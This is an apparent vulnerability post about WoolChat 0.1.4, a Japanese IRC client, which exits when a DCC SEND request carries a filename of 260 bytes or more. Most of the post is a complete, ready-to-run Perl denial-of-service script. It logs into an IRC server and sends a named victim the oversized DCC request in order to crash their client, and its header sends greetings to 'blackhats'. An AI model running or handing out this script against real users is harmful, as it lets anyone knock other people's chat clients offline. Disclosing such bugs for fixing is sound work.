woolchat.txt

`Hi,  
I found a bug about WoolChat (japanese popular irc client)  
http://www.vector.co.jp/soft/win95/net/se091872.html  
which allow anyone to kill victim's WoolChat. It has a problem  
to handle DCC SEND query so if 260 (or more) bytes file  
name is specified, it exits immediately with error dialog.  
DoS script (in perl) here:  
  
#!/usr/bin/perl  
  
# ---- doswchat.pl  
# DoS against WoolChat 0.1.4  
# greetz to: Japanese all blackhats =)  
# written by White_E  
# http://nogimmick.org/  
  
use Socket;  
my $vict=$ARGV[0] || die "usage: $0 <nick>\n";  
my ($host,$port)=('irc.tokyo.wide.ad.jp','6664'); # modify  
my ($user,$nick)=('USER USER USER USER','bnzyrgwp'); # modify  
my $recv;  
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));  
select(S);$|=1;select(STDOUT);$|=1;  
my $paddr=pack_sockaddr_in($port,inet_aton($host));  
connect(S,$paddr) || die "ERR: connect()\n";  
print "[*] connected to server.\n";  
print S "USER $user\r\nNICK $nick\r\n";  
print "[*] USER and NICK sent.\n";  
foreach (0..40) {  
$recv=<S>;  
# print $recv;  
last if ($recv =~ m/\s+376\s+/); # end of motd  
}  
  
my $file='A' x 270;  
my $size='999';  
my $msg="privmsg $vict :\x01DCC SEND $file 1234567890 2004 $size\x01\r\n";  
  
print S $msg;  
print "[*] attack done.\n";  
print S "quit\r\n";  
close(S);  
exit;  
  
Regards,  
  
----  
White_E <[email protected]>  
http://nogimmick.org/  
`